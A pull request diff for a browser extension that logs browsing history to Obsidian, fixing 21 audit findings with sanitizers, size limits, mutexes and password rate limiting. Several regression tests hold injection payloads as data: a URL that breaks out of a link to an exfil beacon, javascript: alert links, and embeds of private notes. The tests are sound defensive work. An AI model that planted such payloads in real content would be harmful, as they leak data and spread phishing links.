### PR TITLE
fix: VulnHunterセキュリティ監査で指摘された21件の脆弱性を修正

### DIFF
--- a/pbi/00-INDEX.md
+++ b/pbi/00-INDEX.md
@@ -10,16 +10,7 @@
 
 ## 未着手 ⬜ / 部分実装 🔶
 
-VulnHunterセキュリティ監査（`obsidian-smart-history_VULNHUNT_RESULTS_2026-07-21-000000/`、確認済み21件）由来のPBI群。優先順位はvulnhunter-fixのクラスタスコア（Critical=8/High=4/Medium=2/Low=1）に基づく。
-
-| PBI | タイトル | 状態 | 難易度 | 副作用 | 対象VULN件数 |
-|---|---|---|---|---|---|
-| [2026-07-22-01-fix-obsidian-markdown-injection-core](2026-07-22-01-fix-obsidian-markdown-injection-core.md) | Obsidianマークダウン注入の根本修正（共有サニタイザ+主要2入口点） | ⬜ | 🟡中 | 🟢なし | 4 (VULN-001,002,004,005) |
-| [2026-07-22-02-fix-obsidian-markdown-injection-downstream](2026-07-22-02-fix-obsidian-markdown-injection-downstream.md) | Obsidianマークダウン注入 — 派生サーフェス修正（PBI A後続） | ⬜ | 🟡中 | 🟢なし | 3 (VULN-006,007,020) |
-| [2026-07-22-03-fix-reliability-races-resource-exhaustion](2026-07-22-03-fix-reliability-races-resource-exhaustion.md) | 信頼性ハードニング — 競合状態・リソース枯渇の解消 | ⬜ | 🔴高 | 🟡軽微 | 6 (VULN-003,008,011,012,014,016) |
-| [2026-07-22-04-fix-settings-import-bypass-ssrf](2026-07-22-04-fix-settings-import-bypass-ssrf.md) | 設定インポート署名検証バイパスの解消とループバックSSRFの防止 | ⬜ | 🟡中 | 🟡軽微 | 3 (VULN-009,010,013) |
-| [2026-07-22-05-fix-master-password-lockout](2026-07-22-05-fix-master-password-lockout.md) | マスターパスワード認証試行回数制限の統一 | ⬜ | 🟢低 | 🟢なし | 2 (VULN-018,021) |
-| [2026-07-22-06-fix-master-password-protection-integrity](2026-07-22-06-fix-master-password-protection-integrity.md) | マスターパスワード保護の完全性（無認証解除・失効漏れ・KDF強度）の修正 | ⬜ | 🔴高 | 🟡軽微 | 3 (VULN-015,017,019) |
+全件実装完了。
 
 新規PBIは `pbi/YYYY-MM-DD-NN-type-slug.md` として作成してください。
 
@@ -30,6 +21,12 @@ VulnHunterセキュリティ監査（`obsidian-smart-history_VULNHUNT_RESULTS_20
 完了済みPBIは [dev-docs/archived/pbi/](../../dev-docs/archived/pbi/) に移動する。
 
 今回アーカイブ済み（実装完了確認済み）:
+- 2026-07-22-01-fix-obsidian-markdown-injection-core.md (VULN-001,002,004,005)
+- 2026-07-22-02-fix-obsidian-markdown-injection-downstream.md (VULN-006,007,020)
+- 2026-07-22-03-fix-reliability-races-resource-exhaustion.md (VULN-003,008,011,012,014,016)
+- 2026-07-22-04-fix-settings-import-bypass-ssrf.md (VULN-009,010,013)
+- 2026-07-22-05-fix-master-password-lockout.md (VULN-018,021)
+- 2026-07-22-06-fix-master-password-protection-integrity.md (VULN-015,017,019)
 - 2026-07-21-04-refactor-hardening-diagnostics-errors.md
 - 2026-07-21-03-refactor-dedup-diagnostics-panel.md
 - 2026-07-21-02-refactor-ai-provider-commons.md
@@ -99,6 +96,6 @@ VulnHunterセキュリティ監査（`obsidian-smart-history_VULNHUNT_RESULTS_20
 
 | 状態 | 件数 |
 |---|---|
-| ⬜ 未着手 | 6 |
+| ⬜ 未着手 | 0 |
 | 🔶 部分実装 | 0 |
-| アーカイブ済み | 87 |
+| アーカイブ済み | 93 |

--- a/src/background/__tests__/recordingLogic-coverage.test.ts
+++ b/src/background/__tests__/recordingLogic-coverage.test.ts
@@ -38,6 +38,7 @@ vi.mock('../../utils/piiSanitizer.ts', () => ({
 
 vi.mock('../../utils/markdownSanitizer.ts', () => ({
   sanitizeForObsidian: vi.fn((s: string) => s),
+  sanitizeUrlForMarkdownTarget: vi.fn((s: string) => s),
 }));
 
 vi.mock('../../utils/localeUtils.ts', () => ({

--- a/src/background/__tests__/recordingLogic-impl.test.ts
+++ b/src/background/__tests__/recordingLogic-impl.test.ts
@@ -44,6 +44,7 @@ vi.mock('../../utils/piiSanitizer.js', () => ({
 
 vi.mock('../../utils/markdownSanitizer.js', () => ({
   sanitizeForObsidian: vi.fn((s: string) => s),
+  sanitizeUrlForMarkdownTarget: vi.fn((s: string) => s),
 }));
 
 vi.mock('../../utils/localeUtils.js', () => ({

--- a/src/background/handlers/dashboardSqliteHandlers.ts
+++ b/src/background/handlers/dashboardSqliteHandlers.ts
@@ -197,6 +197,12 @@ export function createDashboardSqliteHandler(deps: DashboardSqliteHandlerDeps) {
           if (typeof data !== 'string' || data.length === 0) {
             return { success: false, error: 'No data provided' };
           }
+          // VULN-008 fix: reject oversized base64 payload before decoding
+          // 100MB raw → ~134MB base64; use 150MB base64 as safe ceiling
+          const MAX_RESTORE_BASE64_LENGTH = 150 * 1024 * 1024;
+          if (data.length > MAX_RESTORE_BASE64_LENGTH) {
+            return { success: false, error: `Restore data exceeds maximum size (${Math.round(data.length / 1024 / 1024)}MB > 100MB)` };
+          }
           const restored = await deps.restoreDb(base64ToBytes(data));
           return restored ? { success: true } : { success: false, error: 'Restore failed' };
         }

--- a/src/background/handlers/messageHandlers.ts
+++ b/src/background/handlers/messageHandlers.ts
@@ -206,6 +206,9 @@ export function createValidVisitHandler(deps: ValidVisitHandlerDeps) {
 }
 
 export function createFetchUrlHandler(deps: FetchUrlHandlerDeps) {
+  // VULN-012 fix: limit response size to prevent memory exhaustion
+  const MAX_FILTER_LIST_SIZE = 10 * 1024 * 1024; // 10MB
+
   return async (
     message: FetchUrlMessage,
     _sender: chrome.runtime.MessageSender,
@@ -227,8 +230,19 @@ export function createFetchUrlHandler(deps: FetchUrlHandlerDeps) {
         throw new Error(`HTTP ${response.status}: ${response.statusText}`);
       }
 
+      // VULN-012 fix: check Content-Length header first
+      const contentLength = response.headers.get('content-length');
+      if (contentLength && parseInt(contentLength, 10) > MAX_FILTER_LIST_SIZE) {
+        throw new Error(`Filter list too large: ${Math.round(parseInt(contentLength, 10) / 1024 / 1024)}MB exceeds ${MAX_FILTER_LIST_SIZE / 1024 / 1024}MB limit`);
+      }
+
       const contentType = response.headers.get('content-type');
       const text = await response.text();
+
+      // VULN-012 fix: also check actual text size after reading
+      if (text.length > MAX_FILTER_LIST_SIZE) {
+        throw new Error(`Filter list too large: ${Math.round(text.length / 1024 / 1024)}MB exceeds ${MAX_FILTER_LIST_SIZE / 1024 / 1024}MB limit`);
+      }
 
       sendResponse({ success: true, data: text, contentType });
     } catch (error) {
@@ -350,6 +364,18 @@ export function createSaveRecordHandler(deps: SaveRecordHandlerDeps) {
   ): Promise<void> => {
     if (!(await deps.isRecordingAllowed())) {
       sendResponse({ success: false, reason: 'privacy_consent_required' });
+      return;
+    }
+
+    // VULN-004 fix: validate URL scheme before processing (same as MANUAL_RECORD)
+    if (!isSecureUrl(message.payload.url)) {
+      await logWarn(
+        'Blocked SAVE_RECORD with insecure URL',
+        { url: message.payload.url },
+        undefined,
+        'service-worker',
+      );
+      sendResponse({ success: false, error: 'Insecure URL protocol not allowed' });
       return;
     }
 

--- a/src/background/pipeline/steps/__tests__/formatMarkdownStep.test.ts
+++ b/src/background/pipeline/steps/__tests__/formatMarkdownStep.test.ts
@@ -16,13 +16,15 @@ vi.mock('../../../../utils/localeUtils.js', () => ({
 }));
 vi.mock('../../../../utils/markdownSanitizer.js', () => ({
   sanitizeForObsidian: vi.fn((text: string) => text),
+  sanitizeUrlForMarkdownTarget: vi.fn((url: string) => url),
 }));
 
 import { formatMarkdownStep } from '../formatMarkdownStep.js';
-import { sanitizeForObsidian } from '../../../../utils/markdownSanitizer.js';
+import { sanitizeForObsidian, sanitizeUrlForMarkdownTarget } from '../../../../utils/markdownSanitizer.js';
 import type { RecordingContext } from '../../types.js';
 
 const mockSanitize = sanitizeForObsidian as vi.MockedFunction<typeof sanitizeForObsidian>;
+const mockSanitizeUrl = sanitizeUrlForMarkdownTarget as vi.MockedFunction<typeof sanitizeUrlForMarkdownTarget>;
 
 function makeContext(overrides: Partial<RecordingContext> = {}): RecordingContext {
   return {
@@ -45,6 +47,7 @@ function makeContext(overrides: Partial<RecordingContext> = {}): RecordingContex
 beforeEach(() => {
   vi.clearAllMocks();
   mockSanitize.mockImplementation((text: string) => text);
+  mockSanitizeUrl.mockImplementation((url: string) => url);
 });
 
 describe('formatMarkdownStep', () => {
@@ -185,6 +188,32 @@ describe('formatMarkdownStep', () => {
       const result = await formatMarkdownStep(context);
 
       expect(result.sanitizedSummary).toBe('escaped_Original summary');
+    });
+  });
+
+  describe('URL sanitization (VULN-001/004)', () => {
+    it('url が sanitizeUrlForMarkdownTarget を通って埋め込まれる', async () => {
+      mockSanitizeUrl.mockImplementation((url: string) => url.replace(/\)/g, '%29'));
+
+      const context = makeContext({
+        data: { title: 'Test', url: 'https://evil.tld/x)![beacon](https://evil.tld/exfil', content: '' },
+      });
+
+      const result = await formatMarkdownStep(context);
+
+      expect(mockSanitizeUrl).toHaveBeenCalledWith('https://evil.tld/x)![beacon](https://evil.tld/exfil');
+      // The markdown should not contain unescaped ) that could break the link syntax
+      expect(result.markdown).toContain('%29');
+    });
+
+    it('sanitizeUrlForMarkdownTarget is called with the URL from data', async () => {
+      const context = makeContext({
+        data: { title: 'Test', url: 'https://example.com/page', content: '' },
+      });
+
+      await formatMarkdownStep(context);
+
+      expect(mockSanitizeUrl).toHaveBeenCalledWith('https://example.com/page');
     });
   });
 });

--- a/src/background/pipeline/steps/formatMarkdownStep.ts
+++ b/src/background/pipeline/steps/formatMarkdownStep.ts
@@ -5,7 +5,7 @@
  */
 
 import { getUserLocale } from '../../../utils/localeUtils.js';
-import { sanitizeForObsidian } from '../../../utils/markdownSanitizer.js';
+import { sanitizeForObsidian, sanitizeUrlForMarkdownTarget } from '../../../utils/markdownSanitizer.js';
 import type { RecordingContext, PipelineStepFunction } from '../types.js';
 
 /**
@@ -31,6 +31,8 @@ export const formatMarkdownStep: PipelineStepFunction = async (
 
   // Sanitize for Obsidian (XSS protection)
   const sanitizedTitle = sanitizeForObsidian(title);
+  // Sanitize URL for Markdown link target (VULN-001/004 fix)
+  const sanitizedUrl = sanitizeUrlForMarkdownTarget(url);
   // Normalize newlines and extra spaces - Obsidian list format breaks with newlines
   const normalizedSummary = summary.replace(/\n+/g, ' ').replace(/  +/g, ' ').trim();
   const finalSanitizedSummary = sanitizeForObsidian(normalizedSummary);
@@ -46,7 +48,7 @@ export const formatMarkdownStep: PipelineStepFunction = async (
   const tagPrefix = tags && tags.length > 0 ? tags.map(t => `#${t}`).join(' ') + ' ' : '';
 
   // Create markdown
-  const markdown = `- ${timestamp} [${sanitizedTitle}](${url})\n    - ${tagPrefix}${finalSanitizedSummary}`;
+  const markdown = `- ${timestamp} [${sanitizedTitle}](${sanitizedUrl})\n    - ${tagPrefix}${finalSanitizedSummary}`;
 
   return {
     ...context,

--- a/src/background/recordingLogic.ts
+++ b/src/background/recordingLogic.ts
@@ -16,6 +16,7 @@ import type { RecordingResult } from '../messaging/types.js';
 // RecordingPipeline - 静的インポート（動的import()はService Workerで禁止）
 import { createRecordingPipeline } from './pipeline/RecordingPipeline.js';
 import { sharedOfflineNetworkQueue } from './offlineNetworkQueue.js';
+import { Mutex } from './Mutex.js';
 
 // 【設定定数】設定キャッシュの有効期限（秒）🟢
 // 【調整可能性】設定変更の頻度に応じて調整可能
@@ -142,6 +143,18 @@ export class RecordingLogic {
   };
 
   static sessionStore: SessionStore = new SessionStore();
+
+  // VULN-003 fix: per-URL mutex map to prevent TOCTOU races in duplicate check
+  private static urlRecordMutexes = new Map<string, Mutex>();
+
+  private static getUrlMutex(url: string): Mutex {
+    let mutex = RecordingLogic.urlRecordMutexes.get(url);
+    if (!mutex) {
+      mutex = new Mutex({ maxQueueSize: 5, timeoutMs: 60000 });
+      RecordingLogic.urlRecordMutexes.set(url, mutex);
+    }
+    return mutex;
+  }
 
   /**
    * Session storage からキャッシュ状態を復元
@@ -397,19 +410,27 @@ constructor(obsidianClient: ObsidianClient, aiService: AIService, privacyPipelin
   }
 
   async record(data: RecordingData): Promise<RecordingResult> {
-    // Delegate to RecordingPipeline via factory
-    const pipeline = createRecordingPipeline({
-      getPrivacyInfoWithCache: this.getPrivacyInfoWithCache.bind(this),
-      obsidian: this.obsidian,
-      aiService: this.aiService,
-      sqliteClient: this.sqliteClient,
-      offlineNetworkQueue: sharedOfflineNetworkQueue,
-    });
+    // VULN-003 fix: acquire per-URL lock to prevent TOCTOU race between
+    // duplicate check and metadata save across concurrent pipeline executions
+    const mutex = RecordingLogic.getUrlMutex(data.url);
+    await mutex.acquire();
+    try {
+      // Delegate to RecordingPipeline via factory
+      const pipeline = createRecordingPipeline({
+        getPrivacyInfoWithCache: this.getPrivacyInfoWithCache.bind(this),
+        obsidian: this.obsidian,
+        aiService: this.aiService,
+        sqliteClient: this.sqliteClient,
+        offlineNetworkQueue: sharedOfflineNetworkQueue,
+      });
 
-    // Get settings with cache
-    const settings = await this.getSettingsWithCache();
+      // Get settings with cache
+      const settings = await this.getSettingsWithCache();
 
-    return await pipeline.execute(data, settings);
+      return await pipeline.execute(data, settings);
+    } finally {
+      mutex.release();
+    }
   }
 
   async recordWithPreview(data: RecordingData): Promise<RecordingResult> {

--- a/src/background/sessionAlarmsManager.ts
+++ b/src/background/sessionAlarmsManager.ts
@@ -127,11 +127,30 @@ async function lockSession(): Promise<void> {
         // storage.tsのlockSessionをエクスポートして使用するか、
         // 直接ロック処理を実装
         await chrome.storage.local.set({ [StorageKeys.IS_LOCKED]: true });
-        // マスターパスワードキャッシュはstorage.tsで管理されるため、
-        // 通知メッセージを送信してstorage.tsにロックをさせる
-        chrome.runtime.sendMessage({ type: 'SESSION_LOCK_REQUEST', protocolVersion: CURRENT_PROTOCOL_VERSION }).catch(() => {
-            // 送信失敗は無視
-        });
+        // VULN-017 fix: retry lock notification up to 3 times to ensure
+        // encryption session receives the lock signal, preventing stale
+        // cached decryption keys from remaining usable after auto-lock
+        let retries = 3;
+        let success = false;
+        while (retries > 0 && !success) {
+            try {
+                await chrome.runtime.sendMessage({ type: 'SESSION_LOCK_REQUEST', protocolVersion: CURRENT_PROTOCOL_VERSION });
+                success = true;
+            } catch {
+                retries--;
+                if (retries > 0) {
+                    await new Promise(resolve => setTimeout(resolve, 100));
+                }
+            }
+        }
+        if (!success) {
+            logError(
+                'Failed to deliver lock notification after retries. Session will be locked via IS_LOCKED flag check in getOrCreateEncryptionKey.',
+                { retries },
+                ErrorCode.INTERNAL_ERROR,
+                'sessionAlarmsManager.ts'
+            );
+        }
     } catch (error) {
         logError(
             'Failed to lock session',

--- a/src/dashboard/__tests__/masterPassword-r2.test.ts
+++ b/src/dashboard/__tests__/masterPassword-r2.test.ts
@@ -42,6 +42,11 @@ vi.stubGlobal('chrome', {
       set: mockChromeSet,
       remove: mockChromeRemove,
     },
+    session: {
+      get: vi.fn(() => Promise.resolve({})),
+      set: vi.fn(() => Promise.resolve()),
+      remove: vi.fn(() => Promise.resolve()),
+    },
   },
 });
 

--- a/src/dashboard/__tests__/masterPassword.test.ts
+++ b/src/dashboard/__tests__/masterPassword.test.ts
@@ -35,6 +35,11 @@ vi.stubGlobal('chrome', {
       set: mockChromeSet,
       remove: mockChromeRemove,
     },
+    session: {
+      get: vi.fn(() => Promise.resolve({})),
+      set: vi.fn(() => Promise.resolve()),
+      remove: vi.fn(() => Promise.resolve()),
+    },
   },
 });
 
@@ -321,7 +326,7 @@ describe('initMasterPasswordSettings - checkbox events', () => {
     expect(modal.classList.contains('show')).toBe(true);
   });
 
-  it('should remove storage keys, hide options, and show success when checkbox is unchecked', async () => {
+  it('should show auth modal when checkbox is unchecked, then remove on auth success (VULN-015)', async () => {
     setupFullDOM();
     vi.resetModules();
     const { initMasterPasswordSettings } = await import('../masterPassword.js');
@@ -333,6 +338,18 @@ describe('initMasterPasswordSettings - checkbox events', () => {
 
     checkbox.checked = false;
     checkbox.dispatchEvent(new Event('change'));
+
+    await flushPromises();
+
+    // VULN-015 fix: checkbox uncheck now shows auth modal instead of directly removing
+    const authModal = document.getElementById('passwordAuthModal')!;
+    expect(authModal.classList.contains('hidden')).toBe(false);
+
+    // Simulate password entry and submission
+    const authInput = document.getElementById('masterPasswordAuthInput') as HTMLInputElement;
+    authInput.value = 'correct-password';
+    const submitBtn = document.getElementById('submitPasswordAuthBtn')!;
+    submitBtn.click();
 
     await flushPromises();
 

--- a/src/dashboard/__tests__/obsidianFormatter.test.ts
+++ b/src/dashboard/__tests__/obsidianFormatter.test.ts
@@ -1,0 +1,88 @@
+/**
+ * obsidianFormatter.test.ts
+ * VULN-007 regression tests — URL sanitization in Obsidian formatter
+ */
+
+import { formatEntriesToMarkdown } from '../obsidianFormatter.js';
+import type { BrowsingLogEntry } from '../../utils/sqlite-types.js';
+
+function makeEntry(overrides: Partial<BrowsingLogEntry> = {}): BrowsingLogEntry {
+  return {
+    id: 1,
+    title: 'Test Page',
+    url: 'https://example.com/page',
+    domain: 'example.com',
+    summary: 'A test summary',
+    created_at: Date.now(),
+    is_starred: false,
+    content: null,
+    ...overrides,
+  };
+}
+
+describe('obsidianFormatter', () => {
+  describe('formatEntriesToMarkdown', () => {
+    it('should format a normal entry correctly', () => {
+      const entries = [makeEntry()];
+      const result = formatEntriesToMarkdown(entries);
+      expect(result).toContain('[Test Page](https://example.com/page)');
+      expect(result).toContain('A test summary');
+    });
+
+    it('should return empty string for empty array', () => {
+      expect(formatEntriesToMarkdown([])).toBe('');
+    });
+
+    // VULN-007 regression tests
+    it('should sanitize URL containing parentheses (VULN-007)', () => {
+      const entries = [makeEntry({
+        url: 'https://x) \n\n![evil](https://attacker/track.png)\n\n[click me](https://phish.example',
+      })];
+      const result = formatEntriesToMarkdown(entries);
+      // The URL should be percent-encoded so it can't break out of the markdown link
+      expect(result).not.toContain('![evil]');
+      expect(result).toContain('%29'); // encoded )
+    });
+
+    it('should sanitize URL containing square brackets (VULN-007)', () => {
+      const entries = [makeEntry({
+        url: 'https://evil.com/path[test]',
+      })];
+      const result = formatEntriesToMarkdown(entries);
+      expect(result).toContain('%5B');
+      expect(result).toContain('%5D');
+    });
+
+    it('should sanitize URL containing exclamation marks (VULN-007)', () => {
+      const entries = [makeEntry({
+        url: 'https://evil.com/!inject',
+      })];
+      const result = formatEntriesToMarkdown(entries);
+      expect(result).toContain('%21');
+    });
+
+    it('should sanitize title containing markdown links', () => {
+      const entries = [makeEntry({
+        title: 'Click [here](javascript:alert(1))',
+      })];
+      const result = formatEntriesToMarkdown(entries);
+      expect(result).toContain('\\[here\\]');
+    });
+
+    it('should sanitize title containing Obsidian wikilinks', () => {
+      const entries = [makeEntry({
+        title: 'Deal ![[Passwords]]',
+      })];
+      const result = formatEntriesToMarkdown(entries);
+      expect(result).toContain('!\\[\\[Passwords\\]\\]');
+    });
+
+    it('should sanitize summary containing markdown links', () => {
+      const entries = [makeEntry({
+        summary: 'See [evil](https://bad.com) for more',
+      })];
+      const result = formatEntriesToMarkdown(entries);
+      expect(result).toContain('\\[evil\\]');
+    });
+  });
+});

--- a/src/dashboard/dashboard.ts
+++ b/src/dashboard/dashboard.ts
@@ -18,6 +18,7 @@ import { initTrancoConsentPanel } from './trancoConsent.js';
 import type { DashboardSqliteResponseFor } from '../background/handlers/dashboardSqliteProtocol.js';
 import { CURRENT_PROTOCOL_VERSION } from '../background/messageTypes.js';
 import { showConfirmDialog } from './utils/confirmDialog.js';
+import { sanitizeForObsidian, sanitizeUrlForMarkdownTarget } from '../utils/markdownSanitizer.js';
 
 export function openSettingsPanel(section: string): void {
   const panelMap: Record<string, string> = {
@@ -515,15 +516,17 @@ export async function handleTestLocalMarkdown(): Promise<void> {
 
 /**
  * Format a single browsing log entry as markdown
+ * VULN-020 fix: sanitize title and URL to prevent Markdown injection
  */
 function formatEntryToMarkdown(entry: { title?: string | null; url: string; summary?: string | null; created_at: number }): string {
   const timestamp = new Date(entry.created_at).toLocaleTimeString('ja-JP', {
     hour: '2-digit',
     minute: '2-digit'
   });
-  const title = entry.title || entry.url || 'Untitled';
-  const summary = (entry.summary || 'Summary not available.').replace(/\n+/g, ' ').replace(/  +/g, ' ').trim();
-  return `- ${timestamp} [${title}](${entry.url})\n    - ${summary}`;
+  const title = sanitizeForObsidian(entry.title || entry.url || 'Untitled');
+  const url = sanitizeUrlForMarkdownTarget(entry.url);
+  const summary = sanitizeForObsidian((entry.summary || 'Summary not available.').replace(/\n+/g, ' ').replace(/  +/g, ' ').trim());
+  return `- ${timestamp} [${title}](${url})\n    - ${summary}`;
 }
 
 /**

--- a/src/dashboard/masterPassword.ts
+++ b/src/dashboard/masterPassword.ts
@@ -13,6 +13,7 @@ import {
   validatePasswordRequirements,
   validatePasswordMatch
 } from '../utils/masterPassword.js';
+import { checkRateLimit, recordFailedAttempt, resetFailedAttempts } from '../utils/rateLimiter.js';
 import { focusTrapManager } from '../popup/utils/focusTrap.js';
 
 // DOM Elements
@@ -182,13 +183,28 @@ async function authenticatePassword(): Promise<void> {
     }
     return;
   }
+
+  // VULN-021 fix: check rate limit before attempting password verification
+  const rateLimitResult = await checkRateLimit();
+  if (!rateLimitResult.success) {
+    if (passwordAuthError) {
+      passwordAuthError.textContent = rateLimitResult.error || 'Too many attempts.';
+      passwordAuthError.classList.add('visible');
+    }
+    return;
+  }
+
   const getStorageFn = async (keys: string[]) => chrome.storage.local.get(keys);
   const result = await verifyMasterPassword(password, getStorageFn);
   if (result.success) {
+    // VULN-021 fix: reset failed attempts on successful authentication
+    await resetFailedAttempts();
     const action = pendingPasswordAction;
     closePasswordAuthModal();
     if (action) await action(password);
   } else {
+    // VULN-021 fix: record failed attempt
+    await recordFailedAttempt();
     if (passwordAuthError) {
       passwordAuthError.textContent = getMessage('passwordIncorrect') || result.error || 'Incorrect password.';
       passwordAuthError.classList.add('visible');
@@ -203,10 +219,13 @@ export function initMasterPasswordSettings(): void {
       if (isChecked) {
         showPasswordModal('set');
       } else {
-        await chrome.storage.local.remove(['master_password_enabled', 'master_password_salt', 'master_password_hash']);
-        masterPasswordOptions.classList.add('hidden');
-        updateMasterPasswordWarningVisibility(false);
-        showStatus('status', getMessage('passwordRemoved') || 'Master password removed.', 'success');
+        // VULN-015 fix: require password authentication before disabling master password
+        showPasswordAuthModal('export', async () => {
+          await chrome.storage.local.remove(['master_password_enabled', 'master_password_salt', 'master_password_hash']);
+          masterPasswordOptions.classList.add('hidden');
+          updateMasterPasswordWarningVisibility(false);
+          showStatus('status', getMessage('passwordRemoved') || 'Master password removed.', 'success');
+        });
       }
     });
   }

--- a/src/dashboard/obsidianFormatter.ts
+++ b/src/dashboard/obsidianFormatter.ts
@@ -4,7 +4,7 @@
  * Pure function — no side effects, easily testable.
  */
 
-import { sanitizeForObsidian } from '../utils/markdownSanitizer.js';
+import { sanitizeForObsidian, sanitizeUrlForMarkdownTarget } from '../utils/markdownSanitizer.js';
 import type { BrowsingLogEntry } from '../utils/sqlite-types.js';
 
 /**
@@ -23,7 +23,8 @@ function formatSingleEntry(entry: BrowsingLogEntry, appendedAt: number): string 
   });
 
   const title = sanitizeForObsidian(entry.title || entry.url || 'Untitled');
-  const url = entry.url;
+  // VULN-007 fix: sanitize URL for Markdown link target
+  const url = sanitizeUrlForMarkdownTarget(entry.url);
 
   let summary = entry.summary || 'Summary not available.';
   // Normalize newlines to spaces (Obsidian list format breaks with newlines)

--- a/src/dashboard/panels/asyncData/sqliteHistoryPanel.ts
+++ b/src/dashboard/panels/asyncData/sqliteHistoryPanel.ts
@@ -15,6 +15,7 @@ import { errorMessage } from '../../../utils/errorUtils.js';
 import { formatEntryToMarkdown } from '../../../utils/markdownFormatter.js';
 import { copyTextToClipboard } from '../../../utils/clipboard.js';
 import { parseTagsForDisplay } from '../../../utils/tagUtils.js';
+import { isSecureUrl } from '../../../utils/urlUtils.js';
 import { type AsyncDataPanel } from '../types.js';
 import { getRegistry } from '../registryContext.js';
 import { getPluralKey } from '../../../utils/i18nPlural.js';
@@ -660,7 +661,7 @@ export function createSqliteHistoryPanel(): AsyncDataPanel {
           <button type="button" class="sqlite-entry-star ${entry.is_starred ? 'starred' : ''}"
                   data-action="star" title="${t('historyToggleStar')}"
                    aria-pressed="${String(Boolean(entry.is_starred))}" aria-label="${t('historyToggleStar')}">\u2605</button>
-          <a href="${escapeHtml(entry.url)}" target="_blank" class="sqlite-entry-title">
+          <a href="${isSecureUrl(entry.url) ? escapeHtml(entry.url) : '#'}" target="_blank" rel="noopener noreferrer" class="sqlite-entry-title">
             ${escapeHtml(entry.title || entry.url)}
           </a>
           <button type="button" class="sqlite-entry-delete" data-action="delete" title="${t('historyDeleteRecord')}" aria-label="${t('historyDeleteRecordAria')}">\u2715</button>

--- a/src/offscreen/offscreen.ts
+++ b/src/offscreen/offscreen.ts
@@ -28,6 +28,34 @@ import {
 } from './sqlite.js';
 import { errorMessage } from '../utils/errorUtils.js';
 import type { BrowsingLogRecord } from '../utils/sqlite-types.js';
+
+// VULN-016 fix: simple promise-based mutex to serialize SQLite write operations
+// and prevent concurrent transactions from rolling back each other
+class SqliteWriteMutex {
+  private queue: Array<() => void> = [];
+  private locked = false;
+
+  async acquire(): Promise<void> {
+    if (!this.locked) {
+      this.locked = true;
+      return;
+    }
+    return new Promise<void>((resolve) => {
+      this.queue.push(resolve);
+    });
+  }
+
+  release(): void {
+    const next = this.queue.shift();
+    if (next) {
+      next();
+    } else {
+      this.locked = false;
+    }
+  }
+}
+
+const sqliteWriteMutex = new SqliteWriteMutex();
 import { StorageKeys } from '../utils/storage/types.js';
 import { isSqliteMessageType, type SqliteMessage } from '../messaging/sqliteMessages.js';
 
@@ -447,11 +475,18 @@ export function handleOffscreenMessage(
                     sendResponse({ success: false, error: `Prompt failed: ${errorMessage(promptError)}` });
                 }
             } else if (isSqliteMessage) {
-                // Cast is safe: isSqliteMessage narrowed msg.type via isSqliteMessageType
-                // above, so msg.type is a known SqliteMessageType at this point. Payload
-                // shape itself is not runtime-validated here (same trust boundary as
-                // before this refactor: the sender is verified to be our own SW).
-                await handleSqliteMessage(msg as SqliteMessage, sendResponse);
+                // VULN-016 fix: acquire write mutex to serialize SQLite operations
+                // and prevent concurrent transactions from interfering with each other
+                await sqliteWriteMutex.acquire();
+                try {
+                  // Cast is safe: isSqliteMessage narrowed msg.type via isSqliteMessageType
+                  // above, so msg.type is a known SqliteMessageType at this point. Payload
+                  // shape itself is not runtime-validated here (same trust boundary as
+                  // before this refactor: the sender is verified to be our own SW).
+                  await handleSqliteMessage(msg as SqliteMessage, sendResponse);
+                } finally {
+                  sqliteWriteMutex.release();
+                }
 
             } else {
                 console.warn(`Offscreen: Unknown message type ${msg.type}`);

--- a/src/utils/__tests__/crypto.test.ts
+++ b/src/utils/__tests__/crypto.test.ts
@@ -460,8 +460,8 @@ describe('crypto', () => {
             const salt = generateSalt();
             const storedHash = await hashPasswordWithPBKDF2(password, salt);
 
-            const isValid = await verifyPasswordWithPBKDF2(password, storedHash, salt);
-            expect(isValid).toBe(true);
+            const result = await verifyPasswordWithPBKDF2(password, storedHash, salt);
+            expect(result.isValid).toBe(true);
         });
 
         test('間違ったパスワードを拒否できる', async () => {
@@ -469,8 +469,8 @@ describe('crypto', () => {
             const salt = generateSalt();
             const storedHash = await hashPasswordWithPBKDF2(password, salt);
 
-            const isValid = await verifyPasswordWithPBKDF2('wrong-password', storedHash, salt);
-            expect(isValid).toBe(false);
+            const result = await verifyPasswordWithPBKDF2('wrong-password', storedHash, salt);
+            expect(result.isValid).toBe(false);
         });
 
         test('定数時間比較を使用している', { timeout: 60000 }, async () => {

--- a/src/utils/__tests__/markdownSanitizer.test.ts
+++ b/src/utils/__tests__/markdownSanitizer.test.ts
@@ -5,7 +5,7 @@
  * 【Code Review P1】: XSS対策 - Markdownリンクのサニタイズ
  */
 
-import { sanitizeMarkdownLinks, sanitizeAllMarkdownLinks, sanitizeForObsidian } from '../markdownSanitizer.js';
+import { sanitizeMarkdownLinks, sanitizeAllMarkdownLinks, sanitizeForObsidian, escapeObsidianWikilinks, sanitizeUrlForMarkdownTarget } from '../markdownSanitizer.js';
 
 describe('markdownSanitizer', () => {
     describe('sanitizeMarkdownLinks', () => {
@@ -127,6 +127,122 @@ describe('markdownSanitizer', () => {
 
         it('should handle non-string input', () => {
             expect(sanitizeForObsidian(99 as any)).toBe(99);
+        });
+
+        // VULN-002/005 regression tests
+        it('should escape javascript: scheme links (VULN-002)', () => {
+            const input = '[Click here](javascript:alert(document.domain))';
+            const result = sanitizeForObsidian(input);
+            expect(result).toContain('\\[Click here\\]');
+            expect(result).not.toMatch(/\[Click here\]\(javascript:/);
+        });
+
+        it('should escape data: scheme links', () => {
+            const input = '[evil](data:text/html,<script>alert(1)</script>)';
+            const result = sanitizeForObsidian(input);
+            expect(result).toContain('\\[evil\\]');
+        });
+
+        it('should escape Obsidian wikilink syntax [[...]]', () => {
+            const input = 'See [[Private Note]] for details';
+            const result = sanitizeForObsidian(input);
+            expect(result).toContain('\\[\\[Private Note\\]\\]');
+            expect(result).not.toMatch(/\[\[Private Note\]\]/);
+        });
+
+        it('should escape Obsidian embed syntax ![[...]]', () => {
+            const input = 'Embedded: ![[Secret Document]]';
+            const result = sanitizeForObsidian(input);
+            expect(result).toContain('!\\[\\[Secret Document\\]\\]');
+            expect(result).not.toMatch(/!\[\[Secret Document\]\]/);
+        });
+
+        it('should escape both markdown links and wikilinks in same input', () => {
+            const input = 'Click [here](https://evil.com) or see [[Passwords]]';
+            const result = sanitizeForObsidian(input);
+            expect(result).toContain('\\[here\\]');
+            expect(result).toContain('\\[\\[Passwords\\]\\]');
+        });
+    });
+
+    describe('escapeObsidianWikilinks', () => {
